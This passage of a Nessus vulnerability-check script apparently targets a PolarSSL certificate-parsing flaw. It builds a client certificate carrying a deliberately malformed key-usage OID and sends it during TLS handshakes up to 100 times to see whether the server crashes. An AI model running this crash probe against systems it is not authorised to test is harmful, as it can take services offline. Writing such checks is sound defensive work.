  0x30, 0x4f,
  0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04,
  0x06, 0x13, 0x02, 0x55, 0x53,

  0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04,
  0x08, 0x0c, 0x02, 0x4d, 0x44,

  0x31, 0x15, 0x30, 0x13, 0x06, 0x03, 0x55, 0x04,
  0x07, 0x0c, 0x0c, 0x44, 0x65, 0x66, 0x61, 0x75,
  0x6c, 0x74, 0x20, 0x43, 0x69, 0x74, 0x79,

  0x31, 0x1c, 0x30, 0x1a, 0x06, 0x03, 0x55, 0x04,
  0x0a, 0x0c, 0x13, 0x44, 0x65, 0x66, 0x61, 0x75,
  0x6c, 0x74, 0x20, 0x43, 0x6f, 0x6d, 0x70, 0x61,
  0x6e, 0x79, 0x20, 0x4c, 0x74, 0x64
  );

  #   Validity ::= SEQUENCE {
  #        notBefore      Time,
  #        notAfter       Time }
  #
  #   Time ::= CHOICE {
  #        utcTime        UTCTime,
  #        generalTime    GeneralizedTime }
  validity = raw_string(
  0x30, 0x1e,
  0x17, 0x0d, 0x31, 0x35, 0x30, 0x31, 0x32, 0x30,
  0x32, 0x33, 0x33, 0x33, 0x32, 0x34, 0x5a, 0x17,
  0x0d, 0x32, 0x35, 0x30, 0x31, 0x31, 0x37, 0x32,
  0x33, 0x33, 0x33, 0x32, 0x34, 0x5a
  );

  # subject              Name
  subject = raw_string(
  0x30, 0x4f,
  0x31, 0x0b, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04,
  0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x0b, 0x30,
  0x09, 0x06, 0x03, 0x55, 0x04, 0x08, 0x0c, 0x02,
  0x4d, 0x44, 0x31, 0x15, 0x30, 0x13, 0x06, 0x03,
  0x55, 0x04, 0x07, 0x0c, 0x0c, 0x44, 0x65, 0x66,
  0x61, 0x75, 0x6c, 0x74, 0x20, 0x43, 0x69, 0x74,
  0x79, 0x31, 0x1c, 0x30, 0x1a, 0x06, 0x03, 0x55,
  0x04, 0x0a, 0x0c, 0x13, 0x44, 0x65, 0x66, 0x61,
  0x75, 0x6c, 0x74, 0x20, 0x43, 0x6f, 0x6d, 0x70,
  0x61, 0x6e, 0x79, 0x20, 0x4c, 0x74, 0x64
  );

  # SubjectPublicKeyInfo  ::=  SEQUENCE  {
  #        algorithm            AlgorithmIdentifier,
  #        subjectPublicKey     BIT STRING  }
  #
  # AlgorithmIdentifier  ::=  SEQUENCE  {
  #      algorithm               OBJECT IDENTIFIER,
  #      parameters              ANY DEFINED BY algorithm OPTIONAL  }

  # rsaEncryption
  alg = der_encode_oid(oid:"1.2.840.113549.1.1.1");
  alg = der_encode(tag:0x30, data:alg);

  # RFC 3447
  #
  # RSAPublicKey ::= SEQUENCE {
  #     modulus           INTEGER,  -- n
  #     publicExponent    INTEGER   -- e
  #  }
  #
  # NOTE: n and e must to be a odd number
  pubkey = der_encode(tag:2,data:crap(data:'A',length:64)) +
           der_encode(tag:2,data:'\x01\x00\x01') ;
  pubkey = der_encode(tag:0x30, data:pubkey);
  pubkey = '\x00' + pubkey; # no padding bits
  pubkey = der_encode(tag:3, data:pubkey);

  pubkey_info = der_encode(tag:0x30, data: alg + pubkey);


  #   ExtKeyUsageSyntax ::= SEQUENCE SIZE (1..MAX) OF KeyPurposeId
  #
  #   KeyPurposeId ::= OBJECT IDENTIFIER
  #
  if (! kp_cnt) kp_cnt = 1; # mininum one valid key purpose OID

  kp = NULL;
  for(i = 0; i < kp_cnt; i++)
  {
    # timeStamping
    kp += der_encode_oid(oid:"1.3.6.1.5.5.7.3.8");
  }

  if(bad)
  {
    # Malformed timeStamping key purpose OID
    kp += raw_string(
        #0x06, 0x08, # Correct length for the OID
        0x06, 0x7f, # Invalid length for the OID
        0x2b, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x08
    );
  }

  eku = der_encode(tag:0x30, data: kp);
  ext_eku = x509_ext(oid:"2.5.29.37", crit:1, value: eku);

  #Extensions  ::=  SEQUENCE SIZE (1..MAX) OF Extension
  exts = der_encode(tag:0x30, data: ext_eku);

  #extensions      [3]  EXPLICIT Extensions OPTIONAL
  exts = der_encode(tag:0xa3, data: exts);

  tbs = version +
        serial +
        sig_alg_id +
        issuer +
        validity +
        subject +
        pubkey_info +
        # skip optional fields:
        #   issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
        #   subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
        exts;

  tbs = der_encode(tag:0x30, data:tbs);


  # signatureValue       BIT STRING
  sig = crap(data:'S', length:64);
  sig = '\x00' + sig; # no padding bits
  sig = der_encode(tag:3, data:sig);


  cert =  tbs +
          sig_alg_id +
          sig;

  cert = der_encode(tag:0x30, data:cert);

  return cert;
}

function attack(port, kp_cnt)
{
  local_var ciphersuites, cspeclen, exts, exts_len, version;
  local_var alert, chello, clt_cert_req, hellodone, shello;
  local_var cert, cipher, data, i, list, msg, rec, soc;

  # Create a socket for SSL handshake
  soc = open_sock_ssl(port);
  if ( ! soc ) exit(1, "Failed to open an SSL socket on port "+port+".");


  # Use TLS version 1.2, allow downgrade
  version = TLS_12;

  # Use detected cipher suites.
  list = get_kb_list("SSL/Ciphers/" + port);
  if(list) list = make_list(list);
  else list = keys(ciphers);

  ciphersuites = NULL;
  exts = NULL;
  foreach cipher (list)
  {
    if(strlen(ciphers[cipher]) == 2)
    {
      ciphersuites +=  ciphers[cipher];

      if(tls_is_ec_cipher(cipher) && isnull(exts))
      {
        # We need to include EC extensions because it seems PolarSSL server
        # will abort the handshake if a EC-based cipher suite is negotiated
        # but a EC extension is not offered by the client.
        exts = tls_ext_ec() + tls_ext_ec_pt_fmt();
      }
      # Do not specify more than 128 cipher suites, as some older
      # PolarSSL versions don't support it.
      if(strlen(ciphersuites) >= 254) break;
    }
  }

  # Send ClientHello
  msg =
    mkword(version) +                    # Client version
    dec2hex(num:unixtime()) +            # Challenge, epoch portion
    rand_str(length:28) +                # Challenge, random portion
    ssl_vldata_put(data:'', len:1) +     # Session ID
    ssl_vldata_put(data:ciphersuites, len:2) + # Cipher suites
    ssl_vldata_put(data:'\x00', len:1);  # Compression spec

  if(exts) msg += ssl_vldata_put(data:exts, len:2);    # Extensions

  msg = ssl_mk_handshake_msg(data:msg, type:SSL3_HANDSHAKE_TYPE_CLIENT_HELLO);
  chello = ssl_mk_record(type:SSL3_CONTENT_TYPE_HANDSHAKE, data:msg, version:TLS_10);
  send(socket:soc, data: chello);

  hellodone = shello = clt_cert_req = NULL;
  i = 0;
  while (! hellodone)
  {
    # Receive a record from the server.
    data = recv_ssl(socket:soc, timeout:30);
    if (isnull(data)) break;

    # ServerHello
    if(! shello)
    {
      shello = ssl_find(
        blob:data,
        'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,
        'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO
      );

      if (shello)
      {
        # Check handshake version returned by the server
        # If TLS 1.2 not supported, use a lower version
        if (shello['handshake_version'] != TLS_12)
        {

            if (shello['handshake_version'] >= SSL_V3)
            {
              version = shello['handshake_version'];
            }
            else
            {
              close(soc);
              exit(0, 'The service listening on port ' + port + ' does not support SSLv3 or above.' );
            }
        }
      }
      else
      {
        alert = ssl_find(
          blob:data,
          'content_type', SSL3_CONTENT_TYPE_ALERT
        );
        if(alert)
        {
          close(soc);
          exit(1, 'Alert received from service listening on port '+ port +': level '+ alert['level'] + ', description code ' + alert['description'] + ', Nessus could not procdeed with the vulnerablity check.');
        }
      }
    }

    # Client Certificate Request
    if(! clt_cert_req)
    {
      clt_cert_req = ssl_find(
        blob:data,
        'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,
        'handshake_type',SSL3_HANDSHAKE_TYPE_CERTIFICATE_REQUEST
      );

    }

    # Server Hello Done.
    if(! hellodone)
    {
      hellodone = ssl_find(
        blob:data,
        'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,
        'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE
      );

      if(hellodone) break;
    }

    # ServerHelloDone not seen after a higher number of SSL records
    # Something is very wrong
    if(i++ > 16)  break;
  }

  # Make sure we got a ServerHelloDone
  if(! hellodone)
  {
    close(soc);
    exit(1, 'ServerHelloDone not received from service listening on port '+ port +'.');
  }

  # We cannot send a client cert if not asked by the server
  if(! clt_cert_req)
  {
    close(soc);
    exit(1, 'The service listening on port '+ port +' did not ask for a client certificate.');
  }

  cert = my_cert(kp_cnt: kp_cnt, bad:TRUE);

  if(isnull(cert))
  {
    close(soc);
    exit(1, 'Failed to create a bad certificate to send to SSL server listening on '+ port +'.');
  }

  msg = ssl_vldata_put(data:cert, len:3);  # cert
  msg = ssl_vldata_put(data: msg, len:3);  # cert chain
  msg = ssl_mk_handshake_msg(
    type : SSL3_HANDSHAKE_TYPE_CERTIFICATE,
    data : msg
  );
  rec = ssl_mk_record(type:SSL3_CONTENT_TYPE_HANDSHAKE, data:msg, version:version);

  send(socket: soc, data: rec);
  usleep(100);
  close(soc);
}

#
# MAIN
#

# Get an SSL port
port = get_ssl_ports(fork:TRUE);
if (isnull(port))
  exit(0, "The host does not appear to have any SSL-based services.");

# Attempt to crash remote SSL server
for(i = 1; i <= 100; i++)
{
  attack(port:port, kp_cnt: i);

  if(service_is_dead(port:port) == 1)
  {
    extra = 'Crash at attempt ' + i + '.';
    security_hole(port:port, extra: extra);
    exit(0);
  }
  # If service is not dead, cannot tell it's vulnerable

}